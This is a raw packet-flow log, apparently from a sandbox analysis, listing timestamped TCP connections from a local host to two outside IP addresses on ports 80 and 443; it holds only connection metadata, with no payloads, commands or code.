Sep 4, 2024 17:37:09.790627003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790649891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790661097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790669918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790679932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790683031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790689945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790693045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790707111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790719986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790731907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790733099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790744066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790769100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790776014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790863991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790874958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790884018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790893078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790901899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790903091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790915012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790915966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790926933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790936947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790936947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790951967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790965080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790992975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.791003942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.791024923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.791033983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.791043997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.791079044 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802242041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802319050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802325010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802335978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802345991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802357912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802366018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802366972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802376032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802390099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802411079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802449942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802460909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802469969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802479982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802484035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802505016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802527905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802562952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802577972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802587032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802596092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802604914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802618980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802639008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802696943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802706003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802715063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802725077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802731991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802742958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802755117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802774906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802784920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802795887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802804947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802814007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802822113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802845001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802931070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802942991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802952051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802959919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802964926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802972078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802978039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.802983046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802994967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.802998066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803004026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803020000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803039074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803067923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803076982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803085089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803095102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803102970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803103924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803109884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803119898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803128958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803134918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803149939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803170919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803308010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803319931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803328991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803340912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803344011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803349972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803355932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803366899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803369045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803380013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803399086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803440094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803451061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803459883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803471088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803472996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803482056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803488970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803492069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803502083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803509951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803530931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803544998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803706884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803719044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803728104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803738117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803745031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803754091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803755045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803762913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803775072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803785086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803786039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803795099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803806067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803814888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803814888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803826094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.803833008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803853035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.803869963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804053068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804065943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804075003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804084063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804095030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804100990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804106951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804116964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804121017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804128885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804135084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804140091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804147005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804150105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804176092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804192066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804193020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804224014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804403067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804414988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804423094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804431915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804440975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804449081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804452896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804460049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804462910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804476976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804497004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804497957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804497957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804507017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804516077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804518938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804524899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804526091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804538012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804544926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804548979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804558992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804565907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804569960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.804575920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.804601908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.805336952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805378914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.805392981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805403948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805434942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.805464983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805476904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805485964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805495024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.805500984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.805520058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.805541039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.808937073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.808953047 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.808989048 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.808998108 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809020042 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809046984 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809288979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809303999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809341908 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809350014 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809386015 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809861898 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809876919 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809911013 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809917927 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.809930086 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.809947968 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811300993 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811319113 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811345100 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811351061 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811367035 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811386108 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811584949 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811599016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811636925 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811642885 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.811654091 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.811675072 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.813015938 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.813030005 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.813064098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.813071012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.813081026 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.813112020 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.814110994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814126015 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814172029 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.814177990 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814218998 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.814425945 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814440012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814476013 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.814482927 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.814497948 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.814522028 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.821767092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821779013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821798086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821809053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821815968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.821820021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821832895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821836948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.821844101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821852922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.821860075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.821885109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823072910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823116064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823127985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823132038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823148966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823168039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823198080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823209047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823219061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823230028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823240995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823257923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823277950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823349953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823363066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823371887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823383093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823390007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823398113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823401928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823417902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823437929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.823924065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.823968887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824107885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824120045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824129105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824152946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824166059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824168921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824177980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824189901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824198008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824201107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824217081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824234962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824245930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824357033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824389935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824898958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824909925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824919939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.824948072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.824965954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825006962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825020075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825030088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825041056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825042963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825054884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825078011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825129032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825139999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825150013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825160980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825170040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825171947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825185061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825190067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825196028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825217962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825229883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825926065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825939894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825948954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.825968027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.825990915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826108932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826122046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826132059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826150894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826164007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826174021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826208115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826227903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826241016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826251030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.826261997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.826275110 CEST	49719	80	192.168.2.6	147.45.44.104
